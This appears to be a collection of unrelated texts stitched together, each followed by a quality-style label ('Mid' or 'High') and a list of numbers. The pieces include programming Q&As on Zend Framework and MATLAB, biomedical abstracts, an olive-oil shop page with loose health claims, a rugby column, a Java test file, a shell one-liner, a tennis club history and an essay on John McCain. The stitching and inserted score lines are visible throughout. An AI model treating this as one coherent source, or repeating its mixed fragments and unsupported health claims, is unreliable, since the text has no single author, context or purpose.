Q: Zend Framework 2 Form creation via Factory. How to remove elements from fieldset depending on role? I am creating a form using factories and specified form structure by configuring Fieldsets. However, user with the role "admin" may edit form with all fields of an Entity and regular user "client" edit just few fields. That is why I have to delete elements from fieldsets in controller. $this->form->getBaseFieldset()->remove('name'); $this->form->getBaseFieldset()->remove('title'); $this->form->getBaseFieldset()->remove('message');` Is it possible to specify in Fieldset or Form configuration for what role element must be added or deleted? class ZoneDefaultElement extends Fieldset implements InputFilterProviderInterface { public function __construct($name, $entity) { parent::__construct($name); $this->add([ 'name' => 'title', 'type' => Element\Text::class, 'attributes' => [ 'class' => 'form-control', ], 'options' => [ 'label' => 'Title', 'label_attributes' => [ 'class' => 'col-sm-2 control-label required', ], ], ], ['priority' => 1]) }; } A: The second parameter of the constructor can be anything (in fact in Fieldset it is an empty array if not given), so you should be able to just pass in an array of items to use: class ZoneDefaultElement extends Fieldset implements InputFilterProviderInterface { public function __construct($name, $options) { parent::__construct($name); $entity = $options['entity']; $user = $options['user']; // Standard element $this->add([ 'name' => 'title', 'type' => Element\Text::class, 'attributes' => [ 'class' => 'form-control', ], 'options' => [ 'label' => 'Title', 'label_attributes' => [ 'class' => 'col-sm-2 control-label required', ], ], ], ['priority' => 1]); if ($user->isAdmin()) { // Add "admin-only" elements } }; } | Mid | [
0.6378378378378371,
29.5,
16.75
] |
Q: Calculate the pixel distance to three defined pixel in matlab I want to classify pixels of one tiff image according to pixel's RGB colour. The input is an image and three predefined colours for water(r0,g0,b0), forest(r1,g1,b1) and building(r2,g2,c2). The classification is based on the distance between image pixel and these three colors. If a pixel is closet to the water, the pixel is water and changed it the water RGB. The distance is calculated as (one sample) sqrt((x-r0)^2+(y-g0)^2+(z0-b0)^2) The sample implementation is: a=imread(..); [row col dim] = size(a); % dim =3 for i=1:row for j=1:col dis1=sqrtCal(a(i,j,:)-water) dis2=sqrtCal(a(i,j,:)-forest) dis3=sqrtCal(a(i,j,:)-build) a(i,j,:) = water; if dis2< dis1 dis1 = dis2 a(i,j,:) = forest end dis3=sqrt(a(i,j,:)-build) if dis3<dis1 a(i,j,:) = build end end end This implementation should work. The problem is that the two for loops is not a good choice. So is there any good alternatives in the Matlab? The D = pdist(X,distance) Seems not appliable for my case. A: I think this does what you want. The number of reference colors is arbitrary (3 in your example). Each reference color is defined as a row of the matrix ref_colors. Let MxN denote the number of pixels in the original image. Thus the original image is an MxNx3 array. result_index is an MxN array which for each original pixel contains the index of the closest reference color. result is a MxNx3 array in which each pixel has been assigned the RBG values of the closest reference color. im = rand(10,12,3); %// example image ref_colors = [ .1 .1 .8; ... %// water .3 .9 .2; ... %// forest .6 .6 .6 ]; %// build: example reference colors dist = sum(bsxfun(@minus, im, permute(ref_colors, [3 4 2 1])).^2, 3); %// 4D array containing the distance from each pixel to each reference color. %// Dimensions are: 1st: pixel row, 2nd: pixel col, 3rd: not used, %// 4th: index of reference color [~, result_index] = min(dist, [], 4); %// compute arg min along 4th dimension result = reshape(ref_colors(result_index,:), size(im,1), size(im,2), 3); | Mid | [
0.65324384787472,
36.5,
19.375
] |
Three-dimensional structure of toxin OSK1 from Orthochirus scrobiculosus scorpion venom. A 600 MHz 1H NMR study of toxin OSK1, blocker of small-conductance Ca2+-activated K+ channels, is presented. The unambiguous sequential assignment of all the protons of the toxin was obtained using TOCSY, DQF-COSY, and NOESY experiments at pH 3.0 (10, 30, and 45 degrees C) in aqueous solution. 3J(N alpha), 3J(alphabeta) vicinal spin coupling constants were determined in high-resolution spectra. The cross-peak volumes in NOESY spectra and the coupling constants were used to define the local structure of the protein by the program HABAS and to generate torsion angle and interproton distance constraints for the program DIANA. Hydrogen-deuterium exchange rates of amide protons showed possible locations of hydrogen bonds. The hydrogen bond acceptors and disulfide bridges between residues 8-28, 14-33, and 18-35 were determined when analyzing distance distribution in preliminary DIANA structures. All constraints were used to obtain a set of 30 structures by DIANA. The resulting rms deviations over 30 structures are 1.30 A for the heavy atoms and 0.42 A for the backbone heavy atoms. The structures were refined by constrained energy minimization using the SYBYL program. Their analysis indicated the existence of the alpha-helix (residues 10-21) slightly distorted at the Cys14 residue, two main strands of the antiparallel beta-sheet (24-29, 32-38), and the extended fragment (2-6). The motif is stabilized by the disulfide bridges in the way, common to all known scorpion toxins. Using the fine spatial toxin structure, alignment of the homologues, mutagenesis analysis, and comparison of scorpion toxin family functions, we delineate some differences significant for the toxin specificity. | High | [
0.7205673758865241,
31.75,
12.3125
] |
The phenotype of adult versus pediatric patients with inborn errors of metabolism. Until recently, inborn errors of metabolism (IEM) were considered a pediatric specialty, as emphasized by the term "inborn," and the concept of adult onset IEM has only very recently reached the adult medical community. Still, an increasing number of adult onset IEM have now been recognized, as new metabolomics and molecular diagnostic techniques have become available. Here, we discuss possible mechanisms underlying phenotypic variability in adult versus children with IEM. Specifically, phenotypic severity and age of onset are expected to be modulated by differences in residual protein activity possibly driven by various genetic factors. Phenotypic variability may also occur in the context of similar protein expression, which suggests the intervention of environmental, ontogenic, and aging factors. | High | [
0.692198581560283,
30.5,
13.5625
] |
Sarafino, the company that distributes the Olearia San Giorgio Olive Oil that we sell here at Cochran's, is a small importing and distribution company that deals only in natural and uncompromised artisanal products which are true to their origins. We carry the internationally renowned Olearia San Giorgio Virgin and Extra Virgin Olive Oils and the new Organic Extra Virgin Olive Oil. Read all about the recent Gold Medals our Olive Oil took home. These products are created on their own family estate. "We have come to value traditional farming operations that offer personal responsibility for what they create. Our goal is to defend and promote such artisanal practices, and it is exclusively with these types of operations that we do business. We plan to continue on this path and build our reputation as an honest, hard working, genuine food provider with nothing to hide."- from the Sarafino website We carry the Olearia San Giorgio line of Olive Oil because we follow the 9 Guidelines for buying Good Olive Oil and want to bring the best quality Olive Oil with the greatest health benefits to our customers. Today, the oils of Olearia San Giorgio are present in the best national and international restaurants, wine cellars and specialized shops. They have recently received national and international awards and recognition for the quality of their oils. Read more about the Fazari family, who created the award winning Olearia San Giorgio company in Italy 74 years ago.Unfortunately, choosing a good Olive Oil is a very complex process and I would suggest doing some further reading. Check out more tips on buying great olive oil from Truth in Olive Oil. And if you have any questions about authentic Olive Oil, I'd be happy to discuss this with you.Tim Everyone always looks for the terms Extra Virgin. Unfortunately you cannot trust the term Extra Virgin until you follow the guidelines below: The term ‘Cold Pressed’ is a marketing ploy. All modern olive oil production uses acentrifuge method not an actual pressing method so look for the words ‘cold or mechanically extracted’ instead. Avoid the words “pure,” “natural” and “light” as they are misleading terms. However they do indicate that the oil has been chemically treated. Look for “made in Italy.” Avoid “imported, packed or bottled.” Also, don’t be taken in by Italian flags and scenes from the Tuscan countryside on the packaging. Look for a family or cooperative name and contact information. This means the oil is grown and produced from one family (or farm), not from a corporation that blends some olive oil with other cheaper seed oils.** Olives are the only ingredient in olive oil and should be listed as such on the label as ‘cultivars’. This is similar to when you are purchasing wine and look for the grape varietal. Look for a harvest date or best before date. Olive oil breaks downs. Avoid light, oxygen and heat. Keep in a cool, dark, dry place. Most oil producers give their product a maximum 2 year shelf life and bottle it in a dark bottle. It takes 17-18 pounds of olives to produce one liter of olive oil. Think of how much it would cost you to purchase this many olives at your local supermarket olive bar, let alone all the labour, packaging and transportation needed to get the olive oil to you! Though high prices don’t guarantee great oil, low prices – under about $11 for a liter – strongly suggest that the oil you’re buying is inferior. Most importantly is taste. There are 700 varieties of olives and with every years’ harvest, the taste of olives will vary. Like wine, there are many different factors that determine the taste of olive oil. Good olive oil should be slightly bitter, pungent and peppery. These are usually indicators of the presence of healthful antioxidants, anti-inflammatories and other healthful “minor components.” Also, avoid oils that have no flavor. After identifying all of the above, you can then look for Extra Virgin or Virgin. Extra Virgin is the highest quality of olive oil - it has a free acidity, expressed as oleic acid, of no more than 0.8 grams per 100 grams (0.8%). Extra virgin olive oil accounts for less than 10% of oil in many producing countries. This oil is typically derived from an unripe olive. Virgin olive oil which has a free acidity, expressed as oleic acid, of not more than 2 grams per 100 grams (2.0%). These olives are more mature and offer more of a sweeter, full bodied taste. This is a very complex subject and I would suggest doing some further reading. We carry Olearia San Giorgio Olive Oil products here at Cochran's. Tim **Most commonly, it seems, extra virgin oil is mixed with a lower grade olive oil, often not from the same country. Sometimes, another vegetable oil such as colza or canola is used. The resulting blend is then chemically coloured, flavoured and deodorised, and sold as extra-virgin to a producer. So, after last week’s newsletter on how to select good or “real” olive oil, I would like to give a brief overview of its health benefits. This is a big subject and I am not an expert. This overview is meant as a starting point. Please do your own follow up reading and research. There appears to be a lot of conclusive finding as well as some speculative conclusions. Traditionally a low fat diet has been prescribed to prevent various diseases such as heart disease and diabetes. While studies have shown that high fat diets may increase the risk of certain diseases such as cancer and diabetes, it appears that it is the typeof fat that counts rather than the amount of fat. Fat is essential to your health because it supports a number of your body’s functions such as cell growth, the regulation of your body temperature, nutrient absorption, energy levels & the production of important hormones. We need fats in our diet. The key is to focus on eating the healthy fats and avoid the unhealthy fats. Many experts and nutritionists agree that a diet rich in monounsaturated fats such as the ones found in olive oil, nuts and seeds bolsters the immune system, protects against viruses and actually protects from many chronic diseases. Cancer: The phytonutrient in olive oil, oleocanthal, mimics the effect of ibuprofen in reducing inflammation, which can decrease the risk of breast cancer and its recurrence. Squalene and lignans are among the other olive oil components being studied for their possible effects on cancer. Oxidative Stress: Olive oil is rich in antioxidants, especially vitamin E, long thought to minimize cancer risk. Among plant oils, olive oil is the highest in monounsaturated fat, which doesn’t oxidize in the body, and its low in polyunsaturated fat, the kind that does oxidize. Blood Pressure: Recent studies indicate that regular consumption of olive oil can help decrease both systolic and diastolic blood pressure. Diabetes: Most popular research agrees that a” Mediterranean style” diet rich in olive oil , low in saturated fats, moderately rich in carbohydrates and high in soluble fiber from fruits, vegetables and grains is the most effective approach for diabetes. This diet reduces the risk of type II diabetes by almost 50 percent compared to a low fat diet. (Type II diabetes is the most common and preventable form of diabetes). Olive oil helps lower “bad” low-density lipoproteins while improving blood sugar control and enhances insulin sensitivity. Obesity: Although high in calories, olive oil has shown to help reduce levels of obesity, as long as they are used in moderation. Choose monounsaturated rich foods such as olive oil in place of other fatty foods (particularly butter and margarine) — not in addition to them. And remember that you can't make unhealthy foods healthier simply by adding olive oil to them. Rheumatoid Arthritis: Although the reasons are still not fully clear, recent studies have proved that people with diets containing high levels of olive oil are less likely to develop rheumatoid arthritis. Osteoporosis: A high consumption of olive oil appears to improve bone mineralization and calcification. It helps calcium absorption and so plays an important role in aiding sufferers and in preventing the onset of Osteoporosis. Other studies indicate that olive oil consumption can minimize depression, risk of stroke and the hardening of the arteries as you get older and even skin cancer. Olive oil has many positive health benefits. But like most “super foods” it is only one part of a healthy diet and life style. Again, this is only a brief overview. There is a ton of good information out there….continue reading on this subject. Tim*Information from the Mayoclinic.org., Sarafino.com and Oliveoiltimes.com | High | [
0.6839622641509431,
36.25,
16.75
] |
With two Kiwi teams resting up, focus this weekend in Super Rugby will be on whether the Blues and Highlanders can right the ship, and whether the Crusaders can keep on keeping on. The fact they're all up against non-New Zealand opposition should help. Meanwhile all sorts has been happening in the boardrooms, with the mooted All Blacks-England test aborted, Sanzaar making decisions, but not announcements, on Super Rugby's future makeup and the dire state of the Wellington Sevens revealed. With all that whizzing round his head, here are rugby writer Marc Hinton's hot topics for the week: Is George Moala a legitimate All Blacks contender to face the Lions? Yes, if he continues to light it up like he did for the Blues over the first 50 minutes of their 33-24 defeat to the Crusaders. The key for Moala is consistency. Right now he's on the outside looking in of the midfield pecking order, with the likes of Ryan Crotty, Anton Lienert-Brown, Malakai Fekitoa and, probably, Sonny Bill Williams all ahead of him. Throw in Ngani Laumape, Matt Proctor and Rieko Ioane and it might just be Hansen's most competitive position. READ MORE: * Fekitoa cleared to start * Hammett not pushing panic button * Super Rugby: Report card * Chiefs soar, Highlanders poor * Jordie's magic sparks Canes But Moala's line-breaking ability in Christchurch was impressive. More of that on a regular basis and he might enter calculations. The big No 12 is a go-forward merchant of the highest order. But what Steve Hansen will be looking closely at are complementary skills like distribution, defence and decision-making. Imminent return of Williams will be pivotal. Will Tana Umaga pair him with Moala or Rieko Ioane? And is Moala a better 12 or 13? What will the Highlanders-Brumbies game in Canberra on Saturday night tell us? Two important things. First, whether there's any life in this Highlanders campaign. You have to think a victory in Canberra is crucial for the southerners if they're to save their season. Time is still well and truly on their side, but the fuse has to be lit. And, second, whether there is truth in the theory that Australian rugby is in the toilet. If the bottom team in the Kiwi conference rolls one of Oz's pre-eminent sides on their home patch you have to figure it's a resounding yes. Someone flush the dunny! Should we be sad the All Blacks-England November test has died on the vine? Yes and no. Yes because, let's face it, a matchup between the two best teams on the planet who haven't played each other since 2014 would have been enticing, to say the least. Not to mention it might have settled the debate about whose 18-test win streak was better. Also the verbal joust between Steve Hansen and Eddie Jones would have been almost as interesting as the 80 minutes at Twickers. But no because the fact it was going to come at the expense of a Barbarians fixture already pencilled in would have been inappropriate. Don't get me wrong: there's nothing compelling about a Baabaas game these days. They used to be awesome when they were the Lions by another name; but now they're just cobbled together piecemeal lineups of mostly old-stagers well past their best. But they got in first, negotiated the fixture and it would have been just wrong to take it from them. Was Jordie Barrett's performance last Saturday night really that good? It certainly seemed to be. Some of his touches were sublime. The behind the back pass, the pinpoint crosskick ... even more impressive was the sight of him steaming in to save tries with corner flag tackles dripping with commitment, timing and character. Look, the kid has clearly got it. But there won't be any rush with him at the highest level. Let him build experience and confidence at Super Rugby level first. And maybe figure out just where his best position might be. Still, the day is drawing closer when there will be three Barretts in an All Blacks match day 23. Are the Crusaders legit contenders to end their nine-year title drought? With that pack, they have to be. Especially now they've made a rip-roaring start and given themselves a shot at the finals home advantage they will likely need to secure a first title since 2008. Their slow starts have to be addressed. The Houdini act is as fun as all heck, but they need to give themselves a little more margin for error at the back end. And you have to think they need more cut and thrust in the backline. That might be Razor Robertson's biggest challenge. But there's no arguing with a 4-0 start, with Kieran Read still yet to lace 'em up. With forwards like they've got, that's some mighty foundations they have in place. Should the sevens move from Welly, and do we care? Yes, they should move. And, no, we shouldn't care. Wellington has clearly had its day, and the people have voted with their feet. All good things come to an end, and thanks to the Fun Police's icy grip, this party is now well and truly over. Just where it moves to needs thought, but options are limited. Auckland has the population, but might Queenstown have more appeal? Christchurch deserves a big event, but sadly doesn't have a venue yet to do justice to it. But this is minor league stuff in rugby's big scheme. It's hard not to think that discerning Kiwi fans have figured that out. Take away the party, and all you really have is a bunch of guys not good enough to play professional XVs. | Mid | [
0.560483870967741,
34.75,
27.25
] |
Wayne Township, Noble County, Ohio Wayne Township is one of the fifteen townships of Noble County, Ohio, United States. The 2000 census found 507 people in the township. Geography Located in the northern part of the county, it borders the following townships: Millwood Township, Guernsey County – northeast Beaver Township – east Marion Township – southeast Seneca Township – south Buffalo Township – southwest corner Richland Township, Guernsey County – northwest No municipalities are located in Wayne Township. Name and history It is one of twenty Wayne Townships statewide. Government The township is governed by a three-member board of trustees, who are elected in November of odd-numbered years to a four-year term beginning on the following January 1. Two are elected in the year after the presidential election and one is elected in the year before it. There is also an elected township fiscal officer, who serves a four-year term beginning on April 1 of the year after the election, which is held in November of the year before the presidential election. Vacancies in the fiscal officership or on the board of trustees are filled by the remaining trustees. References External links Noble County Chamber of Commerce Category:Townships in Noble County, Ohio Category:Townships in Ohio | Mid | [
0.6150234741784031,
32.75,
20.5
] |
/* * Copyright (c) 2013, Regents of the University of California * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package edu.uci.python.test.datatype; import static edu.uci.python.test.PythonTests.*; import org.junit.*; public class SubscriptTest { @Test public void simple() { String source = "a = [0, 1, 2, 3, 4]\n" + // "b = 1\n" + // "print(a[b])"; assertPrints("1\n", source); } @Test public void simple2() { String source = "a = [0, 1, 2, 3, 4]\n" + // "print (a[1:3:1])"; assertPrints("[1, 2]\n", source); } } | Mid | [
0.6143790849673201,
35.25,
22.125
] |
commandlinefu_id: 360 translator: weibo: '' hide: true command: |- ls -l | egrep ^d summary: |- List only the directories | Mid | [
0.57537688442211,
28.625,
21.125
] |
Labels Lenten Joke Jock, the painter, often would thin his paint so it would go further. So when the Church decided to do some deferred maintenance, Jock was able to put in the low bid, and got the job. As always, he thinned his paint way down with turpentine. One day while he was up on the scaffolding -- the job almost finished -- he heard a horrendous clap of thunder, and the sky opened. The downpour washed the thinned paint off the church and knocked Jock off his scaffold and onto the lawn among the gravestones and puddles of thinned and worthless paint. Jock knew this was a warning from the Almighty, so he got on his knees and cried: “Oh, God! Forgive me! What should I do?” And from the thunder, a mighty voice: “REPAINT! REPAINT! AND THIN NO MORE!” | Mid | [
0.5851528384279471,
33.5,
23.75
] |
Development and Characterisation of Modified Release Hard Gelatin Capsules, Based on In Situ Lipid Matrix Formation. A new technology was developed to form extended release hard gelatin capsules, based on the lipid matrix formation of Gelucire 50/13 and cetostearyl alcohol. Matrices were formed in situ by filling pulverised lipids, ethylcellulose and active ingredients such as diclofenac sodium, acetaminophen and metronidazol into capsules and heating at 63°C for 11 min. Effects of heating were investigated also on the brittleness of capsule shells. Inhibition of the evaporation of water reduced capsule damage. Dissolution tests and texture analysis were performed to discover the release and mechanical profiles of the matrices. Tests were repeated after 1 month storage and results were compared. Gelucire 50/13 alone prolonged drug release but cetostearyl alcohol slowed drug liberation even further. Drug release from all compositions was found to follow first-order kinetic. Significant softening of the matrices was detected during storage in composition containing only Gelucire 50/13, ethylcellulose and diclofenac sodium. Thermal analysis and IR tests were also performed to discover physicochemical interactions between active pharmaceutical ingredients and excipients. Thermal analysis confirmed a notable interaction between diclofenac sodium and Gelucire 50/13 which could be the cause of the observed softening. In conclusion, modified release hard gelatin capsules were developed by a simple and fast monolithic lipid matrix formation method. | Mid | [
0.646913580246913,
32.75,
17.875
] |
Rapid screening of genetic biomarkers of infectious agents using quantum dot barcodes. The development of a rapid and sensitive infectious disease diagnostic platform would enable one to select proper treatment and to contain the spread of the disease. Here we examined the feasibility of using quantum dot (QD) barcodes to detect genetic biomarkers of the bloodborne pathogens HIV, malaria, hepatitis B and C, and syphilis. The genetic fragments from these pathogens were detected in less than 10 min at a sample volume of 200 μL and with a detection limit in the femtomol range. A next step for the advancement of QD barcode technology to the clinic will require validation of the technology with human samples to assess for matrix effects, head-to-head comparison with existing detection method, development of techniques to automate the assay and detection process, and simplification of analytical device for the read-out of the barcode signal. Our study provides an important intermediate step in the translation of QD barcode technology for screening infectious disease agents in the developed and developing world. | Mid | [
0.652582159624413,
34.75,
18.5
] |
HISTORY In 1890, 39 of the leading citizens of this young, booming city on Elliott Bay founded Olympic Tennis Club with two clay courts at the northwest corner of Madison Street and Minor Avenue on First Hill. The newspaper at the time reported that it was the only "large club" in Seattle. By 1894, the initiation fee was set at $10, and dues for the year were another $10. The following year, a Ladies' Branch of the Club was created. The name was formally changed from Olympic Tennis Club to Seattle Tennis Club at the 1896 annual meeting. Interest in tennis grew over the next few years and became a staple activity for many of the city’s prominent citizens. By 1919, the membership realized the need for a larger facility and instructed the Board of Trustees to obtain the Firloch Canoe Club grounds on the shore of Lake Washington in Madison Park, a popular picnic destination. To reach the new site in the early years of the decade, most members boarded the cable car that traveled along Madison Street from downtown to the ferry landing on Lake Washington. They walked south to the Clubhouse on 40th Avenue’s rough plank roadway, sharing the road with horse drawn wagons. Lake Washington’s water level had been lowered nine feet in 1916 when the locks of the Lake Washington Ship Canal were opened. The Clubhouse had been located just a few feet from the lake. It stood high and dry with a broad bank sloping to the water’s edge. There were only four oiled dirt tennis courts when the Club moved to the Madison Park neighborhood. Faced with the social and economic challenges of World War I, the Great Depression, and World War II, the members of Seattle Tennis Club continued to move forward and progressively added outdoor and indoor courts, an outdoor swimming pool, and improved the Clubhouse facilities. An $11.5 million renovation was completed in June 1999. The remodeling revealed several aspects of Club construction that dated back to those very early days of the Firloch Canoe Club. Extremely wet soil conditions under the oldest part of the Clubhouse forced the contractor to drive pilings the height of 4 1/2 Space Needles. Horseshoe nails were found holding the framing of the original Clubhouse together, perhaps the farrier’s nails from those early horse drawn wagons. In 2014, the Club invested nearly $7 million dollars in making the Indoor Court Building wheelchair accessible by providing an ADA approved passage from the main Clubhouse to the indoor tennis courts, located on the North end of the property. In addition, the Club added a second level viewing area of the indoor courts, with a large screen television, portable bar area and elevator access, outdoor court-side terrace seating, a newly renovated Pro Shop, and renovation of the North Lawn area for catering to large outdoor weddings and events. Today’s Club sits on roughly eight acres and offers its 3000-plus members 19 tennis courts, including six indoor and three clay courts, a gym, fitness room, massage room, squash courts, locker rooms, several dining rooms, event spaces, pool, beach, boathouse, and Pro Shop. Each year the Club hosts the Washington State Open, the most prestigious tennis tournament in the state. | High | [
0.6934673366834171,
34.5,
15.25
] |
The impact of health care market changes on local decision making and STD care: experience in three counties. In 1993 health care reform including universal coverage appeared imminent. Some county health departments elected to discontinue provision of direct services including sexually transmitted disease (STD) care. County A moved in this direction with final clinic closure in 1996. Coincidentally, two other counties elected to continue their STD treatment services. These events have created a "natural experiment" in which to evaluate the contrasting strategies among three counties. This report describes the changes in local delivery over a three-year period (1993-1995). Measurements were carried out in three counties in two states. STD program capacity, service delivery, and morbidity rates for STDs (chlamydia and gonorrhea) were monitored in each study county. Quantitative data were complemented by a qualitative patient survey at each site. Capacity changed dramatically in County A as compared with the other two over the three-year period. Major declines in STD clinic visits (-43%) and laboratory testing (-46%) occurred. A major drop in reported STD incidence (-23% for chlamydia and -49% for gonorrhea) also occurred, including a drop in public provider reporting. In County A, a decision to end delivery of personal health services led to a divestiture in STD service delivery and a decline in all measured parameters. Etiology of concurrent declined in reported STDs is unclear. Possibly decreased public services led to a spurious decline in reporting. Alternatively, an overall strategy of shifting care to private providers has succeeded in reducing disease. Public health surveillance may be less accurate in such settings. | High | [
0.6649746192893401,
32.75,
16.5
] |
Q: asp.net entity framework code first foreign key not retrieve I'm trying to retrieve company with trades. I have included the entites and the retrieve method. As shown, the companies are inside trades already. //company entity public class Companies { public int id { get; set; } public string companyID { get; set; } public string companyName { get; set; } public bool companyMointor { get; set; } } //trade entity public class Trade { public int id { get; set; } public DateTime tradeDate { get; set; } public double tradePrice { get; set; } public int tradeQuantity { get; set; } public Companies tradeCompany { get; set; } public int type { get; set; } public types tradeType { get { return (Entities.types)type; } set { type = (int) value; } } } //methods to retrieve public List<Trade> getTrade() { List<Trade> trades = (from t in dbContext.trades orderby t.tradeDate descending select t).ToList(); return trades; } A: Use the Include method to eager load navigational properties. public List<Trade> getTrade() { List<Trade> trades=dbContext.trades.Include(t => t.tradeCompany) .OrderBy(t => t.tradeDate).ToList(); return trades; } Edit: If you are using ObjectContext API try the following public List<Trade> getTrade() { List<Trade> trades=dbContext.trades.Include("tradeCompany") .OrderBy(t => t.tradeDate).ToList(); return trades; } | Mid | [
0.594059405940594,
37.5,
25.625
] |
Please Choose: Unit Size Description: AAV8-hSyn-DIO-mCherry is a pre-made rAAV in serotype 8 which will Cre dependently over-express mCherry driven under human synapsin promoter as illustrated as the cartoon below. mCherry is a red monomer which matures extremely rapid, making it possible to see results very soon after activating transcription. It is highly photostable and resistant to photobleaching. In the DIO scenario, the transgene of interest is inserted in reverse orientation relative to the 5' promoter and is flanked by oppositely oriented loxP and lox2272 sites. In the absence of Cre expression, the transgene will not be produced. In the presence of Cre expression, the transgene will be "Flip-exchanged" or FLEXed, leading to the expression of the transgene. This is due to a permanent Cre-mediated recombination/inversion of the flanked transgene. This arrangement is called DIO (double-floxed inverse ORF), Cre-ON, Flex-rev (reverse), Flex-ON/FlexON, or DIO-AAV/AAV-DIO (double-floxed inverse ORF in AAV). | Mid | [
0.64,
32,
18
] |
Lehigh Organic Foods sells local, organic produce, more November 29, 2017 A Lehigh Acres business that first opened its doors over 20 years ago is under new ownership. Formerly known as The Healthy Gourmet, the store has reopened as Lehigh Organic Foods, at 1305 Homestead Road N., Suite 104. Recently purchased by a company called Blue Falcon, the store plans to offer the Lehigh community a wider variety of healthy products by expanding on its product lines. Sales associate Christine Thurston explained that residents looking for organic and other health products have been forced to drive into Fort Myers. MELISSA BILLLehigh Organic Foods is expanding its product lines and has added additional refrigerator space to carry a larger variety of foods. "The residents of Lehigh Acres deserve to have a place to go locally and not have to drive an hour away to get what they need," she said. "If we don't currently have it in the store, we can order it." Lehigh Organic Foods offers a selection of organic produce grown by local farmers. The store carries organic produce like Oaks Farms, along with brands such as Rainbow Light, Carlson, Nature's Way Twinlab and Planet Source. There are also food samplings in-store for visitors to try. Article Map "We want customers to be able to try our products and sample new items as they come into the store," Thurston said. According to Thurston, the owners have plans to expand into a larger space in the future. Other changes include additional refrigerator space to carry a larger variety of products and an overall expansion of its product and vitamin lines, along with an increase in the amount of skin care and pet care products carried. Lehigh Organic Foods even has a customer appreciation program. "We created a new discount card program," she said. "Now customers don't have to wait until they reach a certain spending goal to get money taken off their sale. The first weekend of each month - Friday, Saturday and Sunday - customers get 10 percent off their entire purchase." Hours of operation are 8 a.m. to 7 p.m. Monday to Saturday and 10 a.m. to 5 p.m. Sunday. | Mid | [
0.611650485436893,
31.5,
20
] |
Operation Fischreiher Operation Fischreiher (German for heron) was an extension to Operation Blue II during the German invasion of the Soviet Union in World War II. General Friedrich Paulus' 6th Army, and part of the 4th Panzer Army under General Hermann Hoth, was to advance across the Don river towards the city of Stalingrad on the Western bend of the Volga river. The original operational plans had called for a defensive line on the Don river by Army Group B, while Army Group A under General List was to advance south towards the oil fields in the Caucasus. The diversion of Operation Fischreiher became an offensive in its own right, to the detriment of the drive south by Army Group A. The 6th Army came up against the first Soviet defensive lines on August 17, and were then locked in street fighting for the next months until they reached their offensive limit on November 18. After this date, the 6th Army and the 4th Panzer Army were on the defensive after their lines of communication with Army Group B were cut by a Soviet pincer movement from General Nikolai Vatutin's Southwestern Front and General Andrey Yeryomenko's Stalingrad Front, whose forces met in the German rear on between Kalach and Sovetskiy on November 23, 1942. References Bibliography Chant, Christopher. (1986) The encyclopedia of codenames of World War II. Routledge. Category:Battles involving the Soviet Union Category:Military operations of World War II involving Germany | Mid | [
0.6132075471698111,
32.5,
20.5
] |
5 Questions to Ask Your Security Team Beaming up to the cloud: Mission briefings for open source IT leaders on hybrid cloud, auto-scaling, and microservices Building an enterprise-worthy developer environment is a lot like commanding a starship. Your success—and that of your crew—hinges on your ability to run the cloud of tomorrow with tools that power productivity and innovation. This eBook is the IT leader's "mission briefing" for exploring new capabilities built in the cloud—including hybrid distribution, smart scaling, and microservice architectures. | Mid | [
0.609375,
29.25,
18.75
] |
I was a terrible midshipman at the United States Naval Academy. My shoes were never shined, I consistently had crap grades in military performance, and I was more concerned with my mediocre track and field career then any of the platitudes we were forced to memorize about duty, honor, and country. But I graduated in May 2001, and five months later our nation was attacked. Service Academy graduates of my generation played a major role in these wars. Some of us died, some of us never saw a day of combat. But all of us were changed, and came home from deployments around the world with different though strongly held opinions about both our nation’s place in the world and our place in our nation. We were not, of course, the first generation of service Academy graduates to fight a war. John McCain and the Vietnam POWs hold a special place in the oral tradition of the Naval Academy. Within 48 hours of the beginning of our training there, we had all memorized a tap code Stockdale had used to rally men at the depths of an Epictetan hell. We read the Nightingale’s Song, and secretly wondered if we would have ever had the courage to tell a torturer, after months and years of sadist torment, to go fuck themselves if we were offered an early release. We wondered if we would have the courage to stay true to our flag, and to BACK US, should we ever have our arms ripped out of our shoulder sockets. We wondered if we could do what they had done. We wondered all of these things, in the way all anxious youngsters wonder if they will measure up to their forebears. We were right to wonder if we would measure up in combat. Because for many of us, that came, and we were tested. But perhaps we should have wondered more about our ability to measure up in another way, as combat veterans with crows' eyes and grey in our hair eventually to be entrusted with the leadership of a nation. Now, as one of our patron saints passes into that good night, we reflect on his decades of service with honor and decency. John McCain was not a perfect man. He may have been a worse midshipman than me, having graduated fifth from the bottom in his class. He was one of the Keating Five. He was quick to anger. He was ambitious and twice ran for the presidency. But he was also a man who refused to agree with a voter who called Barack Obama an Arab. He compromised politically. He returned to Vietnam with a man who had testified in the Senate about the wrongness of the war, who had been kept literally in shackles, forced time and again to the ropes, where his arms were tied behind his back and he was lifted by his hands until his shoulders dislocated. But as a statesman he believed in our democracy and the strength of diversity of opinion. He kept the faith of his fathers. He showed my generation how to lead, once the guns were silent. He fades from the scene a moderate, thoughtful Republican in a time when the President of the United States, an office McCain never gained, is an impulsive liar who dodged military service out of personal greed and cowardice. We will miss him for what he represents: a better way to think about those who one disagrees with. Some might argue the time for those cut from the same cloth has come and gone. But I’m not so sure we aren’t doing OK. McCain had enough intellectual honesty to disagree with his party when he thought it was wrong, and to never be seduced by the promise of the political rewards his party elders promised would be his if he only toed the line, and kept those shoes shined. 